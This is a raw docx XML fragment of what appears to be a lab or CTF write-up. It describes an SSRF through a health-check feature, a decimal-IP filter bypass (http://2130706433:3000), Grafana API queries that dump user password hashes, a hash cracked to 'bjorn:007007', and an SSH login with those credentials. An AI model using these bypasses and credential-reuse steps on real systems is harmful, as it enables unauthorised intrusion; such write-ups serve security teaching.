    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000002D">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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="12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2768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obtained credentials, it was possible to</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> log into the web application </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">as user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">kenaz</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0721"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="1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361072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inserted the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">obtained token</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> into the application via </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Supabase</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, using it for authentication and access to the application’s features.</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9013"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="123"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943600" cy="28990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As a result, we gained access to the</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> web application.</w:t>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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="128"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2527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Analyzing the application, we identified an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Endpoint Health Check</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> functionality, which allows checking whether a service is active. For example, we used this function to verify the status of the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">web service on port 80 (HTTP).</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67100"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="125"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43600" cy="346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04625"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="12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943600" cy="36046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service has </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">filters </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">that prevent checking </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">internal application ports,</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> limiting access only to certain exposed services.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000004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attempted to access port </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">3306 (MySQL)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> internally through the application, but access was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">blocked by the service filters.</w:t>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762625" cy="4781550"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="129"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762625" cy="47815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bypass the filter</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, we tested the address </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">127.0.0.1</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> represented in decimal format, aiming to circumvent the </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">validations </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">applied by the Endpoint</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> Health Check.</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http://2130706433:3000</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538"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="130"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43600" cy="29085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With the bypass applied, it was possible to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">access port 3000 on the machine</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, which was running </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">internally only.</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behavior characterizes an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSRF (Server-Side Request Forgery)</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> vulnerability, as it allowed </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">forging a legitimate request</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> originating from the server itself, enabling access to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">internal endpoints </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">that should not be externally accessible.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00000000" w:rsidDel="00000000" w:rsidP="00000000" w:rsidRDefault="00000000" w:rsidRPr="00000000" w14:paraId="0000005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22888"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="131"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943600" cy="34228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In the response, a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">JSON </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was returned indicating that the service running on </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">port 3000 </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">was </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Grafana</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, an </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">open-source</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> platform used for </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">real-time monitoring.</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1863"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="132"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28418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was also possible to access the following endpoint, which corresponds to a </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">Grafana REST API endpoint </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">used to </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">search and list dashboards</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> stored in the system:</w:t>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http://2130706433:3000/api/search?type=dash-db</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8210"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="133"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3600" cy="180821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t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">private-users</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> endpoint, it was possible to list system users and obtain their associated password hashes:</w:t>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http://2130706433:3000/api/dashboards/uid/private-users</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03229"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="134" name="image34.png"/>
            <a:graphic>
              <a:graphicData uri="http://schemas.openxmlformats.org/drawingml/2006/picture">
                <pic:pic>
                  <pic:nvPicPr>
                    <pic:cNvPr id="0" name="image34.png"/>
                    <pic:cNvPicPr preferRelativeResize="0"/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId29"/>
                    <a:srcRect b="18772" l="0" r="0" t="0"/>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="5943600" cy="310322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found the user </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">bjorn </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">and cracked the password hash using</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:hyperlink r:id="rId30">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
            <w:b w:val="1"/>
            <w:bCs w:val="1"/>
            <w:color w:val="1155cc"/>
            <w:sz w:val="24"/>
            <w:szCs w:val="24"/>
            <w:u w:val="single"/>
            <w:rtl w:val="0"/>
          </w:rPr>
          <w:t xml:space="preserve">CrackStation</w:t>
        </w:r>
      </w:hyperlink>
      <w:hyperlink r:id="rId31">
        <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
          <w:rPr>
            <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>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bjorn:007007</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13313"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="135"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943600" cy="30133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25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="136"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943600" cy="2235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these </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">credentials</w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">, it was possible to authenticate to the machine’s </w:t>
      </w:r>
      <w:r w:rsidDel="00000000" w:rsidR="00000000" w:rsidRPr="00000000">
        <w:rPr>
          <w:rFonts w:ascii="IBM Plex Sans" w:cs="IBM Plex Sans" w:eastAsia="IBM Plex Sans" w:hAnsi="IBM Plex Sans"/>
          <w:b w:val="1"/>
          <w:bCs w:val="1"/>
          <w:sz w:val="24"/>
          <w:szCs w:val="24"/>
          <w:rtl w:val="0"/>
        </w:rPr>
        <w:t xml:space="preserve">SSH service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105400"/>
            <wp:effectExtent b="25400" l="25400" r="25400" t="25400"/>
            <wp:docPr id="10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5105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pStyle w:val="Heading1"/>
        <w:jc w:val="both"/>
        <w:rPr>
